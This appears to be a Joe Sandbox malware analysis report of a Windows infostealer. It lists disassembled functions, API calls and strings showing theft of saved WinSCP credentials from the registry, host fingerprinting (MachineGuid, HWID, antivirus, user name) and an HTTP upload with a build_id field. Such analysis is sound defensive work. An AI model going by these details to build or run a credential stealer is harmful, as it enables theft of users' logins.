                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0002E3D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                          • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                          • API String ID: 463713726-2798830873
                                                                                                                                                                                          • Opcode ID: 60b9483c8702a07540cc69f8b90d3d9860d546c1b64e18d0fca74686d819e6a6
                                                                                                                                                                                          • Instruction ID: c4446a8a36f14c54b2b06fda4df8eebfad62ae036cc9232151e7296e888a6e67
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60b9483c8702a07540cc69f8b90d3d9860d546c1b64e18d0fca74686d819e6a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CD1C77295112DEADF21EB90EC41BDAB778AF04304F4045E7AA08B6052DA707F89DFA1
                                                                                                                                                                                          Function 00025F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 568 25f39-25ffe call 30519 call 24ab6 call 304e7 * 5 InternetOpenA StrCmpCA 583 26000 568->583 584 26006-2600c 568->584 583->584 585 26012-2619c call 31c4a call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 305c7 call 3058d call 22920 * 2 InternetConnectA 584->585 586 266ff-26727 InternetCloseHandle call 28048 584->586 585->586 662 261a2-261dc HttpOpenRequestA 585->662 591 26766-267ec call 22920 * 4 call 21cde call 22920 call 3d016 586->591 592 26729-26761 call 30549 call 30609 call 3058d call 22920 586->592 592->591 663 261e2-261e8 662->663 664 266f3-266f9 InternetCloseHandle 662->664 665 26206-26690 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 47050 lstrlenA * 2 call 47050 lstrlenA HttpSendRequestA 663->665 666 261ea-26200 InternetSetOptionA 663->666 664->586 809 266d2-266ea InternetReadFile 665->809 666->665 810 26692-2669a 809->810 811 266ec-266ed InternetCloseHandle 809->811 810->811 812 2669c-266cd call 30609 call 3058d call 22920 810->812 811->664 812->809
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00025FD8
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00025FF6
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0002618E
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 000261D2
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,",mode,000578D8,------,000578CC,744fd163d6d4e0ac37e4032bcbfbb6af,",build_id,000578B4,------,000578A8,",0005789C,------), ref: 000265FD
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002660C
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00026617
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002661E
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002662B
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00026639
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00026647
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00026655
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00026662
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00026677
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00026685
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000266E2
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 000266ED
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 000266F9
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026705
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026200
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                          • String ID: "$"$"$------$------$------$------$744fd163d6d4e0ac37e4032bcbfbb6af$build_id$mode
                                                                                                                                                                                          • API String ID: 3702379033-2935816448
                                                                                                                                                                                          • Opcode ID: 4d665efde6e36218c13477ab11b76b0c959a6d49e9bbf16eab45e00affb4095a
                                                                                                                                                                                          • Instruction ID: 9a40153d60c3deec05ef3e1831a3f05b1827c8f4dc2fe14de2cf78e79bcaeecd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d665efde6e36218c13477ab11b76b0c959a6d49e9bbf16eab45e00affb4095a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 322298319411799BDF62EB60DC56BDDB778AF08300F4185E1AA0D77162DA706FCA8FA0
                                                                                                                                                                                          Function 00038643 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 912 38643-38653 call 3859a 915 38844-388a1 LoadLibraryA * 5 912->915 916 38659-3883f call 27d47 GetProcAddress * 20 912->916 918 388a3-388b0 GetProcAddress 915->918 919 388b5-388bc 915->919 916->915 918->919 921 388e7-388ee 919->921 922 388be-388e2 GetProcAddress * 2 919->922 923 38902-38909 921->923 924 388f0-388fd GetProcAddress 921->924 922->921 926 3890b-38918 GetProcAddress 923->926 927 3891d-38924 923->927 924->923 926->927 928 38926-3894a GetProcAddress * 2 927->928 929 3894f 927->929 928->929
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038684
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003869B
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000386B2
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000386C9
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000386E0
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000386F7
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003870E
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038725
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003873C
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038753
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003876A
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038781
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038798
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000387AF
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000387C6
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000387DD
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000387F4
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003880B
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038822
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038839
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003884A
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003885B
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003886C
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003887D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003888E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(75070000,000384C2), ref: 000388AA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(75FD0000,000384C2), ref: 000388C5
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000388DC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(75A50000,000384C2), ref: 000388F7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(74E50000,000384C2), ref: 00038912
                                                                                                                                                                                          • GetProcAddress.KERNEL32(76E80000,000384C2), ref: 0003892D
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038944
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2238633743-0
                                                                                                                                                                                          • Opcode ID: 4e52780941854883f56fc04afc69bead1f4e0ee5740790811fbe99c7f50fa760
                                                                                                                                                                                          • Instruction ID: 7107d9a83534152852cb9a2f7058ae816371ea2cc78a6665cf7112e8a3ca819d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e52780941854883f56fc04afc69bead1f4e0ee5740790811fbe99c7f50fa760
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F711975801216AFDF129F61FC2C9243BB6FB0D70935698A5E90D96230E73248E4EF76
                                                                                                                                                                                          Function 00033B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 930 33b86-345a5 call 304e7 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30cc0 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 315d4 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 31684 call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 309a2 call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 GetCurrentProcessId call 3224a call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30b30 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 31807 call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 31997 call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30c85 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30c53 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 31563 call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30ddb call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30cc0 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30d2e call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30f51 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 31007 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30fba call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 31119 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 31192 call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 314a5 call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 30609 call 3058d call 22920 call 31203 call 305c7 call 3058d call 22920 * 2 call 31203 call 305c7 call 3058d call 22920 * 2 call 30609 call 3058d call 22920 call 21cfd lstrlenA call 304e7 call 36e97 call 22920 * 2 call 21cde
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,000565B6,?,?,?), ref: 00030CD8
                                                                                                                                                                                            • Part of subcall function 00030CC0: HeapAlloc.KERNEL32(00000000), ref: 00030CDF
                                                                                                                                                                                            • Part of subcall function 00030CC0: GetLocalTime.KERNEL32(?), ref: 00030CEB
                                                                                                                                                                                            • Part of subcall function 00030CC0: wsprintfA.USER32 ref: 00030D16
                                                                                                                                                                                            • Part of subcall function 000315D4: _memset.LIBCMT ref: 00031607
                                                                                                                                                                                            • Part of subcall function 000315D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00031626
                                                                                                                                                                                            • Part of subcall function 000315D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0003164B
                                                                                                                                                                                            • Part of subcall function 000315D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00031657
                                                                                                                                                                                            • Part of subcall function 000315D4: CharToOemA.USER32(?,?), ref: 0003166B
                                                                                                                                                                                            • Part of subcall function 00031684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0003169F
                                                                                                                                                                                            • Part of subcall function 00031684: _memset.LIBCMT ref: 000316CE
                                                                                                                                                                                            • Part of subcall function 00031684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000316F6
                                                                                                                                                                                            • Part of subcall function 00031684: lstrcatA.KERNEL32(?,00056ECC,?,?,?,?,?), ref: 00031713
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 000309A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 000309D5
                                                                                                                                                                                            • Part of subcall function 000309A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00030A15
                                                                                                                                                                                            • Part of subcall function 000309A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00030A6A
                                                                                                                                                                                            • Part of subcall function 000309A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00030A71
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(Path: ,0005687C,HWID: ,00056870,GUID: ,00056864,00000000,MachineID: ,00056854,00000000,Date: ,00056848,00056844,000579AC,Version: ,000565B6), ref: 00033DDB
                                                                                                                                                                                            • Part of subcall function 0003224A: OpenProcess.KERNEL32(00000410,00000000,00033DEA,00000000,?), ref: 0003226C
                                                                                                                                                                                            • Part of subcall function 0003224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00032287
                                                                                                                                                                                            • Part of subcall function 0003224A: CloseHandle.KERNEL32(00000000), ref: 0003228E
                                                                                                                                                                                            • Part of subcall function 00030B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B44
                                                                                                                                                                                            • Part of subcall function 00030B30: HeapAlloc.KERNEL32(00000000,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B4B
                                                                                                                                                                                            • Part of subcall function 00031807: __EH_prolog3_catch_GS.LIBCMT ref: 0003180E
                                                                                                                                                                                            • Part of subcall function 00031807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00033EF9,Install Date: ,000568B0,00000000,Windows: ,000568A0,Work Dir: In memory,00056888), ref: 0003181F
                                                                                                                                                                                            • Part of subcall function 00031807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00031830
                                                                                                                                                                                            • Part of subcall function 00031807: CoCreateInstance.OLE32(00052F00,00000000,00000001,00052E30,?), ref: 0003184A
                                                                                                                                                                                            • Part of subcall function 00031807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00031880
                                                                                                                                                                                            • Part of subcall function 00031807: VariantInit.OLEAUT32(?), ref: 000318DB
                                                                                                                                                                                            • Part of subcall function 00031997: __EH_prolog3_catch.LIBCMT ref: 0003199E
                                                                                                                                                                                            • Part of subcall function 00031997: CoInitializeEx.OLE32(00000000,00000000,00000030,00033F67,?,AV: ,000568C4,Install Date: ,000568B0,00000000,Windows: ,000568A0,Work Dir: In memory,00056888), ref: 000319AD
                                                                                                                                                                                            • Part of subcall function 00031997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000319BE
                                                                                                                                                                                            • Part of subcall function 00031997: CoCreateInstance.OLE32(00052F00,00000000,00000001,00052E30,?), ref: 000319D8
                                                                                                                                                                                            • Part of subcall function 00031997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00031A0E
                                                                                                                                                                                            • Part of subcall function 00031997: VariantInit.OLEAUT32(?), ref: 00031A5D
                                                                                                                                                                                            • Part of subcall function 00030C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00021385), ref: 00030C91
                                                                                                                                                                                            • Part of subcall function 00030C85: HeapAlloc.KERNEL32(00000000,?,?,?,00021385), ref: 00030C98
                                                                                                                                                                                            • Part of subcall function 00030C85: GetComputerNameA.KERNEL32(00000000,00021385), ref: 00030CAC
                                                                                                                                                                                            • Part of subcall function 00030C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000213B9), ref: 00030C5F
                                                                                                                                                                                            • Part of subcall function 00030C53: HeapAlloc.KERNEL32(00000000,?,?,?,000213B9), ref: 00030C66
                                                                                                                                                                                            • Part of subcall function 00030C53: GetUserNameA.ADVAPI32(00000000,000213B9), ref: 00030C7A
                                                                                                                                                                                            • Part of subcall function 00031563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00031575
                                                                                                                                                                                            • Part of subcall function 00031563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00031580
                                                                                                                                                                                            • Part of subcall function 00031563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0003158B
                                                                                                                                                                                            • Part of subcall function 00031563: ReleaseDC.USER32(00000000,00000000), ref: 00031596
                                                                                                                                                                                            • Part of subcall function 00031563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00034098,?,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4), ref: 000315A2
                                                                                                                                                                                            • Part of subcall function 00031563: HeapAlloc.KERNEL32(00000000,?,?,00034098,?,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4,Install Date: ), ref: 000315A9
                                                                                                                                                                                            • Part of subcall function 00031563: wsprintfA.USER32 ref: 000315BB
                                                                                                                                                                                            • Part of subcall function 00030DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0005670D,?,?), ref: 00030E0C
                                                                                                                                                                                            • Part of subcall function 00030DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00030E1A
                                                                                                                                                                                            • Part of subcall function 00030DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00030E28
